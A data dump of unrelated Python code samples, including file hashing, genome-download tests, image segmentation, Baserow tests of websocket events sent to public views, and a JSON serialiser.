id (string, length 1-265) | text (string, length 6-5.19M) | dataset_id (string, 7 classes)
---|---|---
1740638 | <reponame>Myne-us/pedb
import os
import sys
import hashlib
walk_dir = sys.argv[1]
def md5_for_file(path, block_size=2**20):
    # Hash the file in fixed-size chunks so large files never have to fit in memory.
    md5 = hashlib.md5()
    with open(path, 'rb') as f:  # binary mode; text mode would corrupt the digest
        while True:
            data = f.read(block_size)
            if not data:
                break
            md5.update(data)
    return md5.hexdigest()  # hexdigest() replaces the Python 2-only digest().encode("hex")
for root, subdirs, files in os.walk(walk_dir):
    for file in files:
        path = os.path.join(root, file)  # portable join instead of root + "\\" + file
        print(path + " : " + hashlib.md5(open(path, 'rb').read()).hexdigest())
        # print(md5_for_file(path))
| StarcoderdataPython |
1763311 | from tempfile import mkdtemp, NamedTemporaryFile
import genomepy
import shutil
import pytest
import os
# Python 2
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
travis = "TRAVIS" in os.environ and os.environ["TRAVIS"] == "true"
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ucsc_human():
"""Test UCSC.
Download human genome from UCSC and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("hg38", "UCSC", genome_dir=tmp)
g = genomepy.Genome("hg38", genome_dir=tmp)
seq = g["chr6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ensembl_human():
"""Test Ensembl.
Download human genome from Ensembl and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("GRCh38.p12", "Ensembl", genome_dir=tmp)
g = genomepy.Genome("GRCh38.p12", genome_dir=tmp)
seq = g["6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ncbi_human():
"""Test NCBI.
Download human genome from NCBI and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("GRCh38.p9", "NCBI", genome_dir=tmp)
g = genomepy.Genome("GRCh38.p9", genome_dir=tmp)
seq = g["6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
| StarcoderdataPython |
1748693 | include("$(PORT_DIR)/boards/manifest.py")
freeze("$(PORT_DIR)/boards/UM_TINYPICO/modules", "dotstar.py")
freeze("modules")
| StarcoderdataPython |
1629315 | from urllib.parse import urlparse
def is_uri(uri, uri_type):
return '/' in uri and uri_type in uri
def get_feature_from_uri(uri, feature):
return uri.split(feature)[-1].split('/')[1]
def extract_artifact_id(artifact_uri):
return int(urlparse(artifact_uri).path.split('/')[-1])
def is_list(l):
# TODO: make this not suck.
return type(l) == list
def listify_duplicate_keys(job_inputs, decode_to_str=False):
inputs = {}
for input_ in job_inputs:
key = input_.key
value = input_.value.decode('utf-8') if decode_to_str else input_.value
if key in inputs:
if is_list(inputs[key]):
inputs[key].append(value)
else:
inputs[key] = [inputs[key], value]
else:
inputs[key] = value
return inputs
| StarcoderdataPython |
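A minimal usage sketch for the `listify_duplicate_keys` helper in the sample above, assuming it runs in the same module as that code; the `Input` namedtuple is an assumption standing in for the real job-input objects, which the helper only requires to expose `key` and `value` attributes.
from collections import namedtuple

# Stand-in for the job-input objects; only .key and .value are needed.
Input = namedtuple('Input', ['key', 'value'])

job_inputs = [
    Input('sample', b'a.fastq'),
    Input('sample', b'b.fastq'),    # duplicate key: both values are collected into a list
    Input('reference', b'hg38'),
]

# decode_to_str=True decodes the bytes values to str before grouping.
# Expected result: {'sample': ['a.fastq', 'b.fastq'], 'reference': 'hg38'}
print(listify_duplicate_keys(job_inputs, decode_to_str=True))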
1723575 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import itertools
import copy
import joblib
import numpy
import scipy.sparse
import segment
import collections
import skimage.io
import features
import color_space
def _calc_adjacency_matrix(label_img, n_region):
r = numpy.vstack([label_img[:, :-1].ravel(), label_img[:, 1:].ravel()])
b = numpy.vstack([label_img[:-1, :].ravel(), label_img[1:, :].ravel()])
t = numpy.hstack([r, b])
A = scipy.sparse.coo_matrix((numpy.ones(t.shape[1]), (t[0], t[1])), shape=(n_region, n_region), dtype=bool).todense().getA()
A = A | A.transpose()
for i in range(n_region):
A[i, i] = True
dic = {i : {i} ^ set(numpy.flatnonzero(A[i])) for i in range(n_region)}
Adjacency = collections.namedtuple('Adjacency', ['matrix', 'dictionary'])
return Adjacency(matrix = A, dictionary = dic)
def _new_adjacency_dict(A, i, j, t):
Ak = copy.deepcopy(A)
Ak[t] = (Ak[i] | Ak[j]) - {i, j}
del Ak[i], Ak[j]
for (p, Q) in Ak.items():
if i in Q or j in Q:
Q -= {i, j}
Q.add(t)
return Ak
def _new_label_image(F, i, j, t):
Fk = numpy.copy(F)
Fk[Fk == i] = Fk[Fk == j] = t
return Fk
def _build_initial_similarity_set(A0, feature_extractor):
S = list()
for (i, J) in A0.items():
S += [(feature_extractor.similarity(i, j), (i, j)) for j in J if i < j]
return sorted(S)
def _merge_similarity_set(feature_extractor, Ak, S, i, j, t):
# remove entries which have i or j
S = list(filter(lambda x: not(i in x[1] or j in x[1]), S))
# calculate similarity between region t and its adjacencies
St = [(feature_extractor.similarity(t, x), (t, x)) for x in Ak[t] if t < x] +\
[(feature_extractor.similarity(x, t), (x, t)) for x in Ak[t] if x < t]
return sorted(S + St)
def hierarchical_segmentation(I, k = 100, feature_mask = features.SimilarityMask(1, 1, 1, 1)):
F0, n_region = segment.segment_label(I, 0.8, k, 100)
adj_mat, A0 = _calc_adjacency_matrix(F0, n_region)
feature_extractor = features.Features(I, F0, n_region)
# stores list of regions sorted by their similarity
S = _build_initial_similarity_set(A0, feature_extractor)
# stores region label and its parent (empty if initial).
R = {i : () for i in range(n_region)}
A = [A0] # stores adjacency relation for each step
F = [F0] # stores label image for each step
# greedy hierarchical grouping loop
while len(S):
(s, (i, j)) = S.pop()
t = feature_extractor.merge(i, j)
# record merged region (larger region should come first)
R[t] = (i, j) if feature_extractor.size[j] < feature_extractor.size[i] else (j, i)
Ak = _new_adjacency_dict(A[-1], i, j, t)
A.append(Ak)
S = _merge_similarity_set(feature_extractor, Ak, S, i, j, t)
F.append(_new_label_image(F[-1], i, j, t))
# bounding boxes for each hierarchy
L = feature_extractor.bbox
return (R, F, L)
def _generate_regions(R, L):
n_ini = sum(not parent for parent in R.values())
n_all = len(R)
regions = list()
for label in R.keys():
i = min(n_all - n_ini + 1, n_all - label)
vi = numpy.random.rand() * i
regions.append((vi, L[i]))
return sorted(regions)
def _selective_search_one(I, color, k, mask):
I_color = color_space.convert_color(I, color)
(R, F, L) = hierarchical_segmentation(I_color, k, mask)
return _generate_regions(R, L)
def selective_search(I, color_spaces = ['rgb'], ks = [100], feature_masks = [features.SimilarityMask(1, 1, 1, 1)], n_jobs = -1):
parameters = itertools.product(color_spaces, ks, feature_masks)
region_set = joblib.Parallel(n_jobs = n_jobs)(joblib.delayed(_selective_search_one)(I, color, k, mask) for (color, k, mask) in parameters)
#flatten list of list of tuple to list of tuple
regions = sum(region_set, [])
return sorted(regions)
| StarcoderdataPython |
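A rough usage sketch for the selective search module above, assuming it is saved as `selective_search.py` with its helper modules (`segment`, `features`, `color_space`) importable alongside it; the image path is a placeholder and the exact bounding-box format is whatever `features.Features.bbox` returns.
import skimage.io
import selective_search   # assumed module name for the code above

image = skimage.io.imread('image.jpg')   # placeholder path

# Each proposal pairs a randomised priority with a bounding box taken from the
# feature extractor; results come back sorted by that priority.
regions = selective_search.selective_search(image, color_spaces=['rgb'], ks=[100], n_jobs=1)

for priority, box in regions[:10]:
    print(priority, box)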
122999 | <filename>tests/unit_tests/test_collection.py
import pytest
def test_collection_kwargs_become_properties(base_collection):
assert base_collection.custom_val == 'custom'
def test_collection_sorts_alphabetically(base_collection):
assert base_collection.pages[0].slug == 'Title_C'
| StarcoderdataPython |
87489 | <reponame>ashishdhngr/baserow
from unittest.mock import patch, call, ANY
import pytest
from django.db import transaction
from baserow.contrib.database.api.constants import PUBLIC_PLACEHOLDER_ENTITY_ID
from baserow.contrib.database.rows.handler import RowHandler
from baserow.contrib.database.views.handler import ViewHandler
from baserow.core.trash.handler import TrashHandler
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_created_public_views_receive_restricted_row_created_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# No public events should be sent to this form view
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
row = RowHandler().create_row(
user=user,
table=table,
values={
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_created_public_views_receive_row_created_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
row = RowHandler().create_row(
user=user,
table=table,
values={
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_deleted_public_views_receive_restricted_row_deleted_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
RowHandler().delete_row(user, table, row.id, model)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_deleted",
"row_id": row.id,
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_deleted",
"row_id": row.id,
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_deleted_public_views_receive_row_deleted_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
RowHandler().delete_row(user, table, row.id, model)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_deleted",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_id": row.id,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_not_visible_in_public_view_when_updated_to_be_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_filters_initially_hiding_all_rows = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_filters_initially_hiding_all_rows, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_filters_initially_hiding_all_rows,
field=visible_field,
type="equal",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_filters_initially_hiding_all_rows,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
initially_hidden_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesntMatchFilter",
},
)
# Double check the row isn't visible in any views to begin with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_hidden_row) == []
RowHandler().update_row(
user,
table,
initially_hidden_row.id,
values={f"field_{hidden_field.id}": "ValueWhichMatchesFilter"},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_filters_initially_hiding_all_rows.slug}",
{
                    # From the public view's perspective the row did not exist
                    # before, so it should appear as a row_created event.
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": initially_hidden_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_updated_to_be_not_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_row_showing = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_row_showing, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
initially_visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_visible_row) == [
public_view_with_row_showing.view_ptr
]
# Update the row so it is no longer visible
RowHandler().update_row(
user,
table,
initially_visible_row.id,
values={
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchFilter",
f"field_{visible_field.id}": "StillVisibleButNew",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_row_showing.slug}",
{
# The row should appear as a deleted event as for the public view
# it effectively has been.
"type": "row_deleted",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_id": initially_visible_row.id,
"row": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent in its state before it
# was updated
f"field_{visible_field.id}": "Visible",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_updated_to_still_be_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_row_showing = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_row_showing, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=hidden_field,
type="contains",
value="e",
)
model = table.get_model()
initially_visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "e",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_visible_row) == [
public_view_with_row_showing.view_ptr
]
# Update the row so it is still visible but changed
RowHandler().update_row(
user,
table,
initially_visible_row.id,
values={
f"field_{hidden_field.id}": "eee",
f"field_{visible_field.id}": "StillVisibleButUpdated",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_row_showing.slug}",
{
"type": "row_updated",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_before_update": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"row": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "StillVisibleButUpdated",
},
"metadata": {},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_restored_public_views_receive_restricted_row_created_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
TrashHandler.trash(
user, table.database.group, table.database, row, parent_id=table.id
)
TrashHandler.restore_item(user, "row", row.id, parent_trash_item_id=table.id)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_restored_public_views_receive_row_created_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
TrashHandler.trash(
user, table.database.group, table.database, row, parent_id=table.id
)
TrashHandler.restore_item(user, "row", row.id, parent_trash_item_id=table.id)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_moved_row_updated_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(public_view, hidden_field, hidden=True)
# Match the visible field
data_fixture.create_view_filter(
view=public_view,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
visible_moving_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
invisible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(visible_moving_row) == [
public_view.view_ptr
]
# Move the visible row behind the invisible one
with transaction.atomic():
RowHandler().move_row(
user, table, visible_moving_row.id, before=invisible_row, model=model
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view.slug}",
{
                    # The row stays visible in the public view, so it should
                    # receive a row_updated event reflecting its new order.
"type": "row_updated",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_before_update": {
"id": visible_moving_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"row": {
"id": visible_moving_row.id,
"order": "0.99999999999999999999",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_invisible_in_public_view_when_moved_no_update_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(public_view, hidden_field, hidden=True)
# Match the visible field
data_fixture.create_view_filter(
view=public_view,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
invisible_moving_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(invisible_moving_row) == []
# Move the invisible row
with transaction.atomic():
RowHandler().move_row(
user, table, invisible_moving_row.id, before=visible_row, model=model
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
]
)
| StarcoderdataPython |
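The Baserow tests above all follow the same pattern: patch `broadcast_to_channel_group`, trigger a row action, then compare `delay.mock_calls` against the expected `call(...)` list, using `ANY` for arguments that do not matter. Below is a stripped-down, standard-library-only sketch of that pattern; the `notify` function is a hypothetical stand-in, not Baserow code, and the real tests inject the mock via the `@patch(...)` decorator shown above.
from unittest.mock import MagicMock, call, ANY


def notify(broadcast, table_id, payload):
    # Hypothetical stand-in for code that fans an event out to a channel group.
    broadcast.delay(f"table-{table_id}", payload, None)


def test_broadcast_called_with_expected_payload():
    mock_broadcast = MagicMock()
    notify(mock_broadcast, 42, {"type": "row_created"})
    # delay.mock_calls records every call made to .delay(); ANY matches any
    # value for arguments the test does not care about.
    assert mock_broadcast.delay.mock_calls == [
        call("table-42", {"type": "row_created"}, ANY),
    ]


if __name__ == "__main__":
    test_broadcast_called_with_expected_payload()
    print("ok")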
1730466 | <reponame>adamlwgriffiths/jaweson
"""Provides Object -> JSON -> Object serialisation functionality.
This code is designed to avoid any `eval` calls which could be
exploited, if the database were compromised, with malicious code.
To avoid calling `eval` on the class type, classes must be registered
with the `register_type` function.
Note: A badly written class could still parse internal data using eval.
"""
from __future__ import absolute_import
from . import serialiser
import json
from json import *
def to_dict(obj):
s = serialiser.find_serialiser(obj)
if s:
return s.to_dict(obj)
raise TypeError('Unable to serialise object of type {}'.format(type(obj)))
def from_dict(jobj):
if '__type__' in jobj:
s = serialiser.find_deserialiser(jobj['__type__'])
if s:
return s.from_dict(jobj)
return jobj
| StarcoderdataPython |
